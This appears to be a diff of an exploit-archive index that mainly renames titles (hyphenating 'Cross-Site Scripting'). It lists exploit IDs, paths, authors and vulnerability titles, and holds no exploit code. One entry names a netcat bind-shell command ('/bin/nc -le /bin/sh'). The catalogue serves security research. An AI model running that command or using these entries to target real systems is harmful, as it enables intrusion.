+36755,platforms/php/webapps/36755.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_user.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36756,platforms/windows/remote/36756.html,"Samsung iPOLiS ReadConfigValue Remote Code Execution",2015-04-14,"Praveen Darshanam",windows,remote,0 -36757,platforms/php/webapps/36757.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 index.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36758,platforms/php/webapps/36758.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 admin/base_useradmin.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36759,platforms/php/webapps/36759.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 admin/index.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36760,platforms/php/webapps/36760.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_ag_main.php Crafted File Upload Arbitrary Code Execution",2012-02-11,indoushka,php,webapps,0 +36757,platforms/php/webapps/36757.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - index.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36758,platforms/php/webapps/36758.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - admin/base_useradmin.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36759,platforms/php/webapps/36759.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - admin/index.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36760,platforms/php/webapps/36760.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted File Upload Arbitrary Code Execution",2012-02-11,indoushka,php,webapps,0 36762,platforms/php/webapps/36762.txt,"WordPress MiwoFTP Plugin 1.0.5 - Multiple CSRF XSS Vulnerabilities",2015-04-14,LiquidWorm,php,webapps,80 36763,platforms/php/webapps/36763.txt,"WordPress MiwoFTP Plugin 1.0.5 - CSRF Arbitrary File Creation Exploit (RCE)",2015-04-14,LiquidWorm,php,webapps,80 36764,platforms/php/webapps/36764.txt,"SMW+ 1.5.6 'target' Parameter HTML Injection",2012-02-13,sonyy,php,webapps,0 36765,platforms/php/webapps/36765.txt,"Powie pFile 1.02 pfile/kommentar.php filecat Parameter XSS",2012-02-13,indoushka,php,webapps,0 36766,platforms/php/webapps/36766.txt,"Powie pFile 1.02 pfile/file.php id Parameter SQL Injection",2012-02-13,indoushka,php,webapps,0 36767,platforms/hardware/remote/36767.html,"D-Link DAP-1150 1.2.94 Cross Site Request Forgery",2012-02-13,MustLive,hardware,remote,0 -36768,platforms/php/webapps/36768.txt,"ProWiki 'id' Parameter Cross Site Scripting",2012-02-10,sonyy,php,webapps,0 +36768,platforms/php/webapps/36768.txt,"ProWiki 'id' Parameter Cross-Site Scripting",2012-02-10,sonyy,php,webapps,0 36769,platforms/php/webapps/36769.txt,"STHS v2 Web Portal - prospects.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 36770,platforms/php/webapps/36770.txt,"STHS v2 Web Portal - prospect.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 36771,platforms/php/webapps/36771.txt,"STHS v2 Web Portal - team.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 @@ -33190,13 +33190,13 @@ id,file,description,date,author,platform,type,port 36784,platforms/php/webapps/36784.txt,"11in1 CMS 1.2.1 - index.php class Parameter Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0 36785,platforms/php/webapps/36785.txt,"11in1 CMS 1.2.1 - admin/index.php class Parameter Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0 36786,platforms/php/webapps/36786.txt,"11in1 CMS 1.2.1 - Admin Password Manipulation CSRF",2012-02-15,"High-Tech Bridge SA",php,webapps,0 -36787,platforms/php/webapps/36787.txt,"LEPTON 1.1.3 - Cross Site Scripting",2012-02-15,"High-Tech Bridge SA",php,webapps,0 +36787,platforms/php/webapps/36787.txt,"LEPTON 1.1.3 - Cross-Site Scripting",2012-02-15,"High-Tech Bridge SA",php,webapps,0 36788,platforms/windows/dos/36788.txt,"Oracle - Outside-In DOCX File Parsing Memory Corruption",2015-04-17,"Francis Provencher",windows,dos,0 36789,platforms/php/dos/36789.php,"PHP 5.3.8 - Remote Denial Of Service",2011-12-18,anonymous,php,dos,0 -36790,platforms/php/webapps/36790.txt,"Tube Ace - 'q' Parameter Cross Site Scripting",2012-02-16,"Daniel Godoy",php,webapps,0 +36790,platforms/php/webapps/36790.txt,"Tube Ace - 'q' Parameter Cross-Site Scripting",2012-02-16,"Daniel Godoy",php,webapps,0 36791,platforms/php/webapps/36791.txt,"CMS Faethon 1.3.4 - 'articles.php' Multiple SQL Injection",2012-02-16,tempe_mendoan,php,webapps,0 36792,platforms/php/webapps/36792.txt,"Pandora FMS 4.0.1 - 'sec2' Parameter Local File Inclusion",2012-02-17,"Ucha Gobejishvili",php,webapps,0 -36793,platforms/php/webapps/36793.txt,"ButorWiki 3.0 - 'service' Parameter Cross Site Scripting",2012-02-17,sonyy,php,webapps,0 +36793,platforms/php/webapps/36793.txt,"ButorWiki 3.0 - 'service' Parameter Cross-Site Scripting",2012-02-17,sonyy,php,webapps,0 36795,platforms/ios/webapps/36795.txt,"Wifi Drive Pro 1.2 iOS - File Include Web",2015-04-21,Vulnerability-Lab,ios,webapps,0 36796,platforms/ios/webapps/36796.txt,"Photo Manager Pro 4.4.0 iOS - File Include",2015-04-21,Vulnerability-Lab,ios,webapps,0 36797,platforms/ios/webapps/36797.txt,"Mobile Drive HD 1.8 - File Include Web",2015-04-21,Vulnerability-Lab,ios,webapps,0 @@ -33219,7 +33219,7 @@ id,file,description,date,author,platform,type,port 36848,platforms/php/webapps/36848.txt,"Tiki Wiki CMS Groupware 'url' Parameter URI Redirection",2012-02-18,sonyy,php,webapps,0 36849,platforms/php/webapps/36849.txt,"VOXTRONIC Voxlog Professional 3.7.x get.php v Parameter Arbitrary File Access",2012-02-20,"J. Greil",php,webapps,0 36850,platforms/php/webapps/36850.txt,"VOXTRONIC Voxlog Professional 3.7.x userlogdetail.php idclient Parameter SQL Injection",2012-02-20,"J. Greil",php,webapps,0 -36851,platforms/php/webapps/36851.txt,"F*EX 20100208/20111129-2 Multiple Cross Site Scripting Vulnerabilities",2012-02-20,muuratsalo,php,webapps,0 +36851,platforms/php/webapps/36851.txt,"F*EX 20100208/20111129-2 - Multiple Cross-Site Scripting Vulnerabilities",2012-02-20,muuratsalo,php,webapps,0 36852,platforms/php/webapps/36852.txt,"TestLink Multiple SQL Injection",2012-02-20,"Juan M. Natal",php,webapps,0 36818,platforms/php/webapps/36818.php,"Wolf CMS 0.8.2 - Arbitrary File Upload Exploit",2015-04-22,"CWH Underground",php,webapps,80 36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow (3)",2015-04-22,"Tomislav Paskalev",windows,local,0 @@ -33264,22 +33264,22 @@ id,file,description,date,author,platform,type,port 36864,platforms/hardware/remote/36864.txt,"Xavi 7968 ADSL Router Multiple Function CSRF",2012-02-21,Busindre,hardware,remote,0 36865,platforms/hardware/remote/36865.txt,"Xavi 7968 ADSL Router webconfig/lan/lan_config.html/local_lan_config host_name_txtbox Parameter XSS",2012-02-21,Busindre,hardware,remote,0 36866,platforms/hardware/remote/36866.txt,"Xavi 7968 ADSL Router webconfig/wan/confirm.html/confirm pvcName Parameter XSS",2012-02-21,Busindre,hardware,remote,0 -36867,platforms/php/webapps/36867.txt,"CPG Dragonfly CMS 9.3.3.0 Multiple Multiple Cross Site Scripting Vulnerabilities",2012-02-21,Ariko-Security,php,webapps,0 +36867,platforms/php/webapps/36867.txt,"CPG Dragonfly CMS 9.3.3.0 - Multiple Multiple Cross-Site Scripting Vulnerabilities",2012-02-21,Ariko-Security,php,webapps,0 36868,platforms/hardware/dos/36868.pl,"Mercury MR804 Router Multiple HTTP Header Fields Denial Of Service Vulnerabilities",2012-02-21,demonalex,hardware,dos,0 36869,platforms/multiple/dos/36869.txt,"IBM solidDB 6.5.0.8 - 'SELECT' Statement 'WHERE' Condition Denial of Service",2012-02-09,IBM,multiple,dos,0 -36870,platforms/php/webapps/36870.txt,"ContentLion Alpha 1.3 - 'login.php' Cross Site Scripting",2012-02-22,"Stefan Schurtz",php,webapps,0 -36873,platforms/php/webapps/36873.txt,"Dolibarr 3.2 Alpha Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",php,webapps,0 +36870,platforms/php/webapps/36870.txt,"ContentLion Alpha 1.3 - 'login.php' Cross-Site Scripting",2012-02-22,"Stefan Schurtz",php,webapps,0 +36873,platforms/php/webapps/36873.txt,"Dolibarr 3.2 Alpha - Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",php,webapps,0 36874,platforms/php/webapps/36874.txt,"Chyrp 2.1.1 - 'ajax.php' HTML Injection",2012-02-22,"High-Tech Bridge SA",php,webapps,0 36875,platforms/php/webapps/36875.txt,"Chyrp 2.1.2 includes/error.php body Parameter XSS",2012-02-22,"High-Tech Bridge SA",php,webapps,0 -36876,platforms/php/webapps/36876.txt,"Oxwall 1.1.1 - 'plugin' Parameter Cross Site Scripting",2012-02-22,Ariko-Security,php,webapps,0 +36876,platforms/php/webapps/36876.txt,"Oxwall 1.1.1 - 'plugin' Parameter Cross-Site Scripting",2012-02-22,Ariko-Security,php,webapps,0 36877,platforms/hardware/remote/36877.html,"Multiple D-Link DCS Products 'security.cgi' Cross-Site Request Forgery",2012-02-23,"Rigan Iimrigan",hardware,remote,0 36878,platforms/php/webapps/36878.txt,"Mobile Mp3 Search Script 2.0 - 'dl.php' HTTP Response Splitting",2012-02-23,"Corrado Liotta",php,webapps,0 36880,platforms/windows/remote/36880.rb,"Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory",2015-05-01,Metasploit,windows,remote,0 36881,platforms/multiple/dos/36881.txt,"TestDisk 6.14 Check_OS2MB Stack Buffer Overflow",2015-05-01,Security-Assessment.com,multiple,dos,0 36882,platforms/php/webapps/36882.txt,"MyJobList 0.1.3 - 'eid' Parameter SQL Injection",2012-02-26,"Red Security TEAM",php,webapps,0 -36883,platforms/php/webapps/36883.txt,"Webglimpse 2.x Multiple Cross Site Scripting Vulnerabilities",2012-02-26,MustLive,php,webapps,0 +36883,platforms/php/webapps/36883.txt,"Webglimpse 2.x Multiple Cross-Site Scripting Vulnerabilities",2012-02-26,MustLive,php,webapps,0 36884,platforms/linux/remote/36884.py,"libpurple 2.8.10 OTR Information Disclosure",2012-02-25,"Dimitris Glynos",linux,remote,0 -36885,platforms/php/webapps/36885.txt,"Bontq 'user/' URI Cross Site Scripting",2012-02-27,sonyy,php,webapps,0 +36885,platforms/php/webapps/36885.txt,"Bontq 'user/' URI Cross-Site Scripting",2012-02-27,sonyy,php,webapps,0 36886,platforms/php/webapps/36886.txt,"OSQA's CMS Multiple HTML Injection Vulnerabilities",2012-02-27,"Ucha Gobejishvili",php,webapps,0 36887,platforms/linux/local/36887.py,"GNOME NetworkManager 0.x Local Arbitrary File Access",2012-02-29,Ludwig,linux,local,0 36888,platforms/php/webapps/36888.html,"Dotclear 2.4.1.2 - /admin/auth.php login_data Parameter XSS",2012-02-29,"High-Tech Bridge SA",php,webapps,0 @@ -33289,14 +33289,14 @@ id,file,description,date,author,platform,type,port 36892,platforms/php/webapps/36892.html,"Traidnt Topics Viewer 2.0 - 'main.php' Cross Site Request Forgery",2012-02-29,"Green Hornet",php,webapps,0 36893,platforms/php/webapps/36893.txt,"Fork CMS 3.x - private/en/locale/index name Parameter XSS",2012-02-28,anonymous,php,webapps,0 36894,platforms/php/webapps/36894.txt,"Fork CMS 3.x backend/modules/error/actions/index.php parse() Function Multiple Parameter Error Display XSS",2012-02-28,anonymous,php,webapps,0 -36895,platforms/php/webapps/36895.txt,"starCMS 'q' Parameter URI Cross Site Scripting",2012-03-02,Am!r,php,webapps,0 +36895,platforms/php/webapps/36895.txt,"starCMS 'q' Parameter URI Cross-Site Scripting",2012-03-02,Am!r,php,webapps,0 36896,platforms/windows/dos/36896.pl,"Splash PRO 1.12.1 - '.avi' File Denial of Service",2012-03-03,"Senator of Pirates",windows,dos,0 36897,platforms/php/webapps/36897.txt,"LastGuru ASP GuestBook 'View.asp' SQL Injection",2012-03-04,demonalex,php,webapps,0 36898,platforms/php/webapps/36898.txt,"Etano 1.20/1.22 search.php Multiple Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0 36899,platforms/php/webapps/36899.txt,"Etano 1.20/1.22 photo_search.php Multiple Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0 36900,platforms/php/webapps/36900.txt,"Etano 1.20/1.22 photo_view.php return Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0 -36914,platforms/php/webapps/36914.txt,"Fork CMS 3.2.x Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-03-06,"Gjoko Krstic",php,webapps,0 -36915,platforms/windows/remote/36915.txt,"NetDecision 4.6.1 Multiple Directory Traversal Vulnerabilities",2012-03-07,"Luigi Auriemma",windows,remote,0 +36914,platforms/php/webapps/36914.txt,"Fork CMS 3.2.x Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2012-03-06,"Gjoko Krstic",php,webapps,0 +36915,platforms/windows/remote/36915.txt,"NetDecision 4.6.1 - Multiple Directory Traversal Vulnerabilities",2012-03-07,"Luigi Auriemma",windows,remote,0 36916,platforms/php/webapps/36916.txt,"Exponent CMS 2.0 - 'src' Parameter SQL Injection",2012-03-07,"Rob Miller",php,webapps,0 36917,platforms/php/webapps/36917.txt,"OSClass 2.3.x - Directory Traversal / Arbitrary File Upload",2012-03-07,"Filippo Cavallarin",php,webapps,0 36909,platforms/windows/local/36909.rb,"RM Downloader 2.7.5.400 - Local Buffer Overflow (Metasploit)",2015-05-04,"TUNISIAN CYBER",windows,local,0 @@ -33311,37 +33311,37 @@ id,file,description,date,author,platform,type,port 36921,platforms/lin_x86/shellcode/36921.c,"Linux/x86 - /bin/nc -le /bin/sh -vp 17771 Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",lin_x86,shellcode,0 36922,platforms/ios/webapps/36922.txt,"vPhoto-Album 4.2 iOS - File Include Web",2015-05-06,Vulnerability-Lab,ios,webapps,0 36906,platforms/linux/dos/36906.txt,"Apache Xerces-C XML Parser < 3.1.2 - DoS POC",2015-05-04,beford,linux,dos,0 -36907,platforms/php/webapps/36907.txt,"WordPress Ultimate Product Catalogue 3.1.2 - Multiple Persistent XSS & CSRF & File Upload",2015-05-04,"Felipe Molina",php,webapps,0 +36907,platforms/php/webapps/36907.txt,"WordPress Ultimate Product Catalogue 3.1.2 - Multiple Persistent XSS / CSRF / File Upload",2015-05-04,"Felipe Molina",php,webapps,0 36908,platforms/lin_x86/shellcode/36908.c,"Linux/x86 - exit(0) shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",lin_x86,shellcode,0 -36965,platforms/php/webapps/36965.txt,"Omnistar Live Cross Site Scripting and SQL Injection",2012-03-13,sonyy,php,webapps,0 +36965,platforms/php/webapps/36965.txt,"Omnistar Live Cross-Site Scripting and SQL Injection",2012-03-13,sonyy,php,webapps,0 36966,platforms/linux/local/36966.txt,"LightDM 1.0.6 Arbitrary File Deletion",2012-03-13,"Ryan Lortie",linux,local,0 -36967,platforms/php/webapps/36967.txt,"Max's Guestbook 1.0 Multiple Remote Vulnerabilities",2012-03-14,n0tch,php,webapps,0 +36967,platforms/php/webapps/36967.txt,"Max's Guestbook 1.0 - Multiple Remote Vulnerabilities",2012-03-14,n0tch,php,webapps,0 36968,platforms/php/webapps/36968.txt,"Max's PHP Photo Album 1.0 - 'id' Parameter Local File Inclusion",2012-03-14,n0tch,php,webapps,0 36969,platforms/windows/dos/36969.txt,"Citrix 11.6.1 Licensing Administration Console Denial of Service",2012-03-15,Rune,windows,dos,0 36970,platforms/php/webapps/36970.txt,"JPM Article Script 6 'page2' Parameter SQL Injection",2012-03-16,"Vulnerability Research Laboratory",php,webapps,0 -36971,platforms/java/webapps/36971.txt,"JavaBB 0.99 - 'userId' Parameter Cross Site Scripting",2012-03-18,sonyy,java,webapps,0 +36971,platforms/java/webapps/36971.txt,"JavaBB 0.99 - 'userId' Parameter Cross-Site Scripting",2012-03-18,sonyy,java,webapps,0 36972,platforms/windows/dos/36972.py,"TYPSoft FTP Server 1.1 - 'APPE' Command Remote Buffer Overflow",2012-03-19,"brock haun",windows,dos,0 36924,platforms/ios/webapps/36924.txt,"PDF Converter & Editor 2.1 iOS - File Include",2015-05-06,Vulnerability-Lab,ios,webapps,0 36925,platforms/php/webapps/36925.py,"elFinder 2 Remote Command Execution (Via File Creation)",2015-05-06,"TUNISIAN CYBER",php,webapps,0 36926,platforms/php/webapps/36926.txt,"LeKommerce 'id' Parameter SQL Injection",2012-03-08,Mazt0r,php,webapps,0 36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 setup/index.php site Parameter Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0 36928,platforms/windows/local/36928.py,"Macro Toolworks 7.5 Local Buffer Overflow",2012-03-08,"Julien Ahrens",windows,local,0 -36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0 +36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0 36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0 -36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0 +36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 - Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0 36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 / 4.1.1 - Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900 36933,platforms/linux/remote/36933.py,"dhclient 4.1 - Bash Environment Variable Command Injection PoC (Shellshock)",2014-09-29,fdiskyou,linux,remote,0 36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System listing.aspx searchText Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0 36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System /help/helpredir.aspx guide Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0 36936,platforms/asp/webapps/36936.txt,"SAP Business Objects InfoView System /webi/webi_modify.aspx id Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0 -36937,platforms/php/webapps/36937.html,"phpMyVisites 2.4 phpmv2/index.php Multiple Cross Site Scripting Vulnerabilities",2012-03-09,AkaStep,php,webapps,0 -36938,platforms/php/webapps/36938.txt,"singapore 0.10.1 - 'gallery' Parameter Cross Site Scripting",2012-03-11,T0xic,php,webapps,0 -36939,platforms/java/webapps/36939.txt,"EJBCA 4.0.7 - 'issuer' Parameter Cross Site Scripting",2012-03-11,MustLive,java,webapps,0 +36937,platforms/php/webapps/36937.html,"phpMyVisites 2.4 phpmv2/index.php Multiple Cross-Site Scripting Vulnerabilities",2012-03-09,AkaStep,php,webapps,0 +36938,platforms/php/webapps/36938.txt,"singapore 0.10.1 - 'gallery' Parameter Cross-Site Scripting",2012-03-11,T0xic,php,webapps,0 +36939,platforms/java/webapps/36939.txt,"EJBCA 4.0.7 - 'issuer' Parameter Cross-Site Scripting",2012-03-11,MustLive,java,webapps,0 36940,platforms/cgi/webapps/36940.txt,"Dell SonicWALL Secure Remote Access (SRA) Appliance Cross-Site Request Forgery",2015-05-07,"Veit Hailperin",cgi,webapps,443 36941,platforms/xml/webapps/36941.txt,"IBM WebSphere Portal Stored Cross-Site Scripting",2015-05-07,"Filippo Roncari",xml,webapps,0 36942,platforms/php/webapps/36942.txt,"WordPress Freshmail Plugin 1.5.8 - (shortcode.php) SQL Injection",2015-05-07,"Felipe Molina",php,webapps,80 36943,platforms/ios/webapps/36943.txt,"Album Streamer 2.0 iOS - Directory Traversal",2015-05-07,Vulnerability-Lab,ios,webapps,0 -36944,platforms/php/webapps/36944.txt,"Synology Photo Station 5 DSM 3.2 - 'photo_one.php' Script Cross Site Scripting",2012-03-12,"Simon Ganiere",php,webapps,0 +36944,platforms/php/webapps/36944.txt,"Synology Photo Station 5 DSM 3.2 - 'photo_one.php' Script Cross-Site Scripting",2012-03-12,"Simon Ganiere",php,webapps,0 36945,platforms/hardware/remote/36945.txt,"TP-LINK TL-WR740N 111130 - 'ping_addr' Parameter HTML Injection",2012-03-12,l20ot,hardware,remote,0 36946,platforms/php/webapps/36946.txt,"Wikidforum 2.10 Advanced Search Multiple Field SQL Injection",2012-03-12,"Stefan Schurtz",php,webapps,0 36947,platforms/php/webapps/36947.txt,"Wikidforum 2.10 Search Field XSS",2012-03-12,"Stefan Schurtz",php,webapps,0 @@ -33371,9 +33371,9 @@ id,file,description,date,author,platform,type,port 36980,platforms/windows/local/36980.py,"VideoCharge Express 3.16.3.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0 36981,platforms/windows/local/36981.py,"VideoCharge Professional + Express Vanilla 3.18.4.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0 36982,platforms/windows/local/36982.py,"VideoCharge Vanilla 3.16.4.06 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0 -37186,platforms/php/webapps/37186.txt,"VFront 0.99.2 CSRF & Persistent XSS",2015-06-03,hyp3rlinx,php,webapps,0 +37186,platforms/php/webapps/37186.txt,"VFront 0.99.2 - CSRF / Persistent XSS",2015-06-03,hyp3rlinx,php,webapps,0 36984,platforms/windows/remote/36984.py,"i.FTP 2.21 - Time Field SEH Exploit",2015-05-11,"Revin Hadi Saputra",windows,remote,0 -37006,platforms/java/webapps/37006.txt,"Minify 2.1.x - 'g' Parameter Cross Site Scripting",2012-03-21,"Ayoub Aboukir",java,webapps,0 +37006,platforms/java/webapps/37006.txt,"Minify 2.1.x - 'g' Parameter Cross-Site Scripting",2012-03-21,"Ayoub Aboukir",java,webapps,0 36986,platforms/php/webapps/36986.txt,"Pluck 4.7 - Directory Traversal",2015-05-11,Wadeek,php,webapps,0 36987,platforms/hardware/webapps/36987.pl,"D-Link DSL-500B Gen 2 - (Parental Control Configuration Panel) Stored XSS",2015-05-11,"XLabs Security",hardware,webapps,0 36988,platforms/hardware/webapps/36988.pl,"D-Link DSL-500B Gen 2 - (URL Filter Configuration Panel) Stored XSS",2015-05-11,"XLabs Security",hardware,webapps,0 @@ -33383,45 +33383,45 @@ id,file,description,date,author,platform,type,port 36992,platforms/php/webapps/36992.txt,"Wing FTP Server Admin 4.4.5 - CSRF Add Arbitrary User",2015-05-11,hyp3rlinx,php,webapps,0 36993,platforms/php/webapps/36993.txt,"SQLBuddy 1.3.3 - Path Traversal",2015-05-11,hyp3rlinx,php,webapps,0 36996,platforms/unix/remote/36996.rb,"SixApart MovableType - Storable Perl Code Execution",2015-05-12,Metasploit,unix,remote,80 -36997,platforms/php/webapps/36997.txt,"CMSimple 3.3 - 'index.php' Cross Site Scripting",2012-03-21,"Stefan Schurtz",php,webapps,0 +36997,platforms/php/webapps/36997.txt,"CMSimple 3.3 - 'index.php' Cross-Site Scripting",2012-03-21,"Stefan Schurtz",php,webapps,0 36998,platforms/php/webapps/36998.txt,"Open Journal Systems (OJS) 2.3.6 - /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php Multiple Parameter XSS",2012-03-21,"High-Tech Bridge",php,webapps,0 36999,platforms/php/webapps/36999.txt,"Open Journal Systems (OJS) 2.3.6 - index.php authors[][url] Parameter XSS",2012-03-21,"High-Tech Bridge",php,webapps,0 37000,platforms/php/webapps/37000.txt,"Open Journal Systems (OJS) 2.3.6 - /lib/pkp/classes/core/String.inc.php String::stripUnsafeHtml() Method XSS",2012-03-21,"High-Tech Bridge",php,webapps,0 -37001,platforms/php/webapps/37001.txt,"Open Journal Systems (OJS) 2.3.6 Multiple Script Arbitrary File Upload",2012-03-21,"High-Tech Bridge",php,webapps,0 +37001,platforms/php/webapps/37001.txt,"Open Journal Systems (OJS) 2.3.6 - Multiple Script Arbitrary File Upload",2012-03-21,"High-Tech Bridge",php,webapps,0 37002,platforms/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 - /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php param Parameter Multiple Function Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",php,webapps,0 37003,platforms/php/webapps/37003.txt,"WordPress Booking Calendar Contact Form 1.0.2 - Multiple vulnerabilities",2015-05-13,"i0akiN SEC-LABORATORY",php,webapps,0 37004,platforms/php/webapps/37004.txt,"PHPCollab 2.5 - SQL Injection",2015-05-13,Wadeek,php,webapps,0 -37007,platforms/linux/remote/37007.txt,"AtMail 1.04 Multiple Security Vulnerabilities",2012-03-22,"Yury Maryshev",linux,remote,0 -37008,platforms/php/webapps/37008.txt,"Event Calendar PHP 'cal_year' Parameter Cross Site Scripting",2012-03-24,3spi0n,php,webapps,0 +37007,platforms/linux/remote/37007.txt,"AtMail 1.04 - Multiple Security Vulnerabilities",2012-03-22,"Yury Maryshev",linux,remote,0 +37008,platforms/php/webapps/37008.txt,"Event Calendar PHP 'cal_year' Parameter Cross-Site Scripting",2012-03-24,3spi0n,php,webapps,0 37009,platforms/java/webapps/37009.xml,"Apache Struts 2.0 - 'XSLTResult.java' Remote Arbitrary File Upload",2012-03-23,voidloafer,java,webapps,0 -37010,platforms/php/webapps/37010.txt,"Zumset.com FbiLike 1.00 - 'id' Parameter Cross Site Scripting",2012-03-25,Crim3R,php,webapps,0 +37010,platforms/php/webapps/37010.txt,"Zumset.com FbiLike 1.00 - 'id' Parameter Cross-Site Scripting",2012-03-25,Crim3R,php,webapps,0 37011,platforms/php/webapps/37011.txt,"Geeklog 1.8.1 - 'index.php' SQL Injection",2012-03-27,HELLBOY,php,webapps,0 37012,platforms/php/webapps/37012.txt,"NextBBS 0.6 - ajaxserver.php Multiple Function SQL Injection",2012-03-27,waraxe,php,webapps,0 37013,platforms/php/webapps/37013.txt,"NextBBS 0.6 index.php do Parameter XSS",2012-03-27,waraxe,php,webapps,0 37014,platforms/windows/dos/37014.py,"iFTP 2.21 Buffer OverFlow Crash PoC",2015-05-14,"dogo h@ck",windows,dos,0 -37015,platforms/asp/webapps/37015.txt,"Matthew1471 BlogX Multiple Cross Site Scripting Vulnerabilities",2012-03-27,demonalex,asp,webapps,0 -37016,platforms/php/webapps/37016.txt,"WordPress Integrator 1.32 - 'redirect_to' Parameter Cross Site Scripting",2012-03-28,"Stefan Schurtz",php,webapps,0 -37017,platforms/php/webapps/37017.txt,"Invision Power Board 4.2.1 - 'searchText' Parameter Cross Site Scripting",2012-03-28,sonyy,php,webapps,0 +37015,platforms/asp/webapps/37015.txt,"Matthew1471 BlogX Multiple Cross-Site Scripting Vulnerabilities",2012-03-27,demonalex,asp,webapps,0 +37016,platforms/php/webapps/37016.txt,"WordPress Integrator 1.32 - 'redirect_to' Parameter Cross-Site Scripting",2012-03-28,"Stefan Schurtz",php,webapps,0 +37017,platforms/php/webapps/37017.txt,"Invision Power Board 4.2.1 - 'searchText' Parameter Cross-Site Scripting",2012-03-28,sonyy,php,webapps,0 37018,platforms/php/webapps/37018.txt,"MyBB 1.6.6 - index.php conditions[usergroup][] Parameter SQL Injection",2013-03-27,"Aditya Modha",php,webapps,0 37019,platforms/php/webapps/37019.txt,"MyBB 1.6.6 - index.php conditions[usergroup][] Parameter XSS",2013-03-27,"Aditya Modha",php,webapps,0 37020,platforms/windows/remote/37020.html,"Apple Safari 5.1.5 For Windows 'window.open()' URI Spoofing",2012-03-28,Lostmon,windows,remote,0 37021,platforms/php/webapps/37021.txt,"TomatoCart 1.2.0 Alpha 2 - 'json.php' Local File Inclusion",2012-03-28,"Canberk BOLAT",php,webapps,0 37022,platforms/php/webapps/37022.txt,"ocPortal 7.1.5 code_editor.php Multiple Parameter XSS",2012-03-28,"High-Tech Bridge",php,webapps,0 37023,platforms/php/webapps/37023.txt,"EasyPHP 'main.php' SQL Injection",2012-03-29,"Skote Vahshat",php,webapps,0 -37024,platforms/php/webapps/37024.txt,"eZ Publish 4.x - 'ezjscore' Module Cross Site Scripting",2012-03-29,"Yann MICHARD",php,webapps,0 +37024,platforms/php/webapps/37024.txt,"eZ Publish 4.x - 'ezjscore' Module Cross-Site Scripting",2012-03-29,"Yann MICHARD",php,webapps,0 37025,platforms/php/webapps/37025.txt,"PHP Designer 2007 - Personal Multiple SQL Injection",2012-03-30,MR.XpR,php,webapps,0 37026,platforms/php/webapps/37026.txt,"e107 1.0 - 'view' Parameter SQL Injection",2012-03-30,Am!r,php,webapps,0 37027,platforms/php/webapps/37027.txt,"Simple Machines Forum (SMF) 2.0.2 index.php scheduled Parameter XSS",2012-03-29,Am!r,php,webapps,0 -37028,platforms/php/webapps/37028.txt,"JamWiki 1.1.5 - 'num' Parameter Cross Site Scripting",2012-03-30,"Sooraj K.S",php,webapps,0 +37028,platforms/php/webapps/37028.txt,"JamWiki 1.1.5 - 'num' Parameter Cross-Site Scripting",2012-03-30,"Sooraj 